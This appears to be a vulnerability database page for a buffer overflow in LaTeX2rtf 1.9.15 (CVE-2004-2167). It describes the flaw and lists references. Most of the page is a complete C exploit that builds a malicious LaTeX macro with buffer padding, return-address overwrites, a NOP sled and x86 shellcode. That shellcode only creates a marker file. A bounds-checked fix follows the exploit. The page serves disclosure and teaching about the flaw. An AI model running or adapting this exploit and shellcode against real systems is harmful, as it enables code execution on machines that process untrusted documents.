LaTeX2rtf Remote Buffer Overflow Vulnerability


Vulnerability ID: 1108182
Vulnerability type: Buffer overflow
Published: 2004-09-21
Updated: 2005-10-20
CVE ID: CVE-2004-2167
CNNVD ID: CNNVD-200412-923
Platform: Linux
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/24622
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-923
|Vulnerability details
LaTeX2rtf 1.9.15, and possibly other versions, contains multiple buffer overflow vulnerabilities. A remote attacker can execute arbitrary code via (1) the expandmacro function, and possibly also via (2) Environments and (3) TranslateCommand.
|Exploit
/*
source: http://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. This issue is due to a failure of the application to perform proper bounds checks before copying data into a fixed sized memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.

The program writes a LaTeX document to stdout whose \row macro body carries the
padding, a NOP sled and the payload below; the payload only creates a file named
"EXPLOITED" (open with O_CREAT) and then exits.
*/

#include <stdio.h>

unsigned char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
{
  int i;

  /* macro definition: everything up to the closing brace is the macro body */
  printf("\\def\\row#1{");

  /* padding that fills the fixed-size buffer */
  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  /* NOP sled */
  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */

  /* file name the payload pops from the stack */
  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
  return 0;
}
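The flaw described above is a copy into a fixed-size buffer with no bounds check during macro expansion. The following added example (not latex2rtf's code; expand_macro_safe and the two check functions are hypothetical names) shows a minimal `#1` substitution that checks every write against the buffer size and refuses an expansion that would not fit, exercised with a constructed 1024-byte macro body like the padding the exploit emits.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical macro expander (not latex2rtf's code): replace every "#1"
 * in body with arg.  Every write is checked against outsz, so an oversized
 * body or argument returns -1 instead of running past the end of out. */
int expand_macro_safe(const char *body, const char *arg, char *out, size_t outsz)
{
    size_t used = 0, arglen = strlen(arg);
    if (outsz == 0)
        return -1;
    while (*body) {
        if (body[0] == '#' && body[1] == '1') {
            if (arglen >= outsz - used)   /* arg plus terminating NUL would not fit */
                return -1;
            memcpy(out + used, arg, arglen);
            used += arglen;
            body += 2;
        } else {
            if (used + 1 >= outsz)        /* char plus terminating NUL would not fit */
                return -1;
            out[used++] = *body++;
        }
    }
    out[used] = '\0';
    return 0;
}

/* Ordinary macro, as in "\def\greet#1{Hello #1!}" invoked with "world";
 * returns 0 when the expansion is exactly "Hello world!". */
int short_body_expands(void)
{
    char out[512];
    if (expand_macro_safe("Hello #1!", "world", out, sizeof out) != 0)
        return -1;
    return strcmp(out, "Hello world!");
}

/* Constructed body of 1024 'x' followed by "#1", like the padding the exploit
 * emits, expanded into a 512-byte buffer: must be refused, not copied. */
int overlong_body_is_rejected(void)
{
    char body[1024 + 3], out[512];
    memset(body, 'x', 1024);
    strcpy(body + 1024, "#1");
    return expand_macro_safe(body, "a", out, sizeof out);
}

int main(void)
{
    printf("short body: %d, overlong body: %d\n", short_body_expands(), overlong_body_is_rejected());
    return 0;
}
```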
|References

Source: XF
Name: latex2rtf-expandmacro-bo(17460)
Link: http://xforce.iss.net/xforce/xfdb/17460
Source: SECTRACK
Name: 1011367
Link: http://www.securitytracker.com/alerts/2004/Sep/1011367.html
Source: BID
Name: 11233
Link: http://www.securityfocus.com/bid/11233
Source: OSVDB
Name: 10216
Link: http://www.osvdb.org/displayvuln.php?osvdb_id=10216
Source: cvs.sourceforge.net
Link: http://cvs.sourceforge.net/viewcvs.py/latex2rtf/latex2rtf/definitions.c?rev=1.22&view=log
Source: XF
Name: latex2rtf-multiple-bo(17487)
Link: http://xforce.iss.net/xforce/xfdb/17487
